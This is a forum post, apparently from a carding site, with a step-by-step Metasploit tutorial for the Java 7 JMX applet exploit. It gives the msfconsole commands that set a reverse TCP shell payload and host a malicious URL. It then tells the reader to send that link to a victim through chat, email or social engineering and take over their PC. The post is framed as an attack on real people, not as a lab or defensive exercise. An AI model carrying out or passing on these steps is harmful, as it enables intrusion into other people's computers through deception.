PDA

View Full Version : BackTrack 5 Tutorials



CardingMafia Admin
03-03-2013, 09:24 AM
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Exploit Targets

Java 7 Update 10

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

http://i1.wp.com/2.bp.blogspot.com/-TFUvmlS5tyg/USzwWtG_NXI/AAAAAAAAF7o/3vzJmvcHzZI/s1600/1.jpg?w=620

Now type use exploit/windows/browser/java_jre17_jmxbean_2

msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)

msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jmxbean_2)>exploit

http://i2.wp.com/3.bp.blogspot.com/-S3XmAgbSGvo/USzwrXTH_aI/AAAAAAAAF7w/UHE__xytHBE/s1600/2.jpg?w=620

http://i2.wp.com/3.bp.blogspot.com/-S3XmAgbSGvo/USzwrXTH_aI/AAAAAAAAF7w/UHE__xytHBE/s1600/2.jpg?w=620

Now an URL you should give to your victim http://192.168.1.7:8080/

http://i2.wp.com/1.bp.blogspot.com/-qdVGDStmnB8/USzw3z7oWlI/AAAAAAAAF74/TikJprVAojU/s1600/3.jpg?w=620

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “*******s -l”” and the “*******s -i ID“ number to connect to the *******. And Now Type “*******s -i ID“

http://i1.wp.com/1.bp.blogspot.com/-shLSaeywyXA/USzxAq7fJHI/AAAAAAAAF8A/AVlL068-nqs/s1600/4.jpg?w=620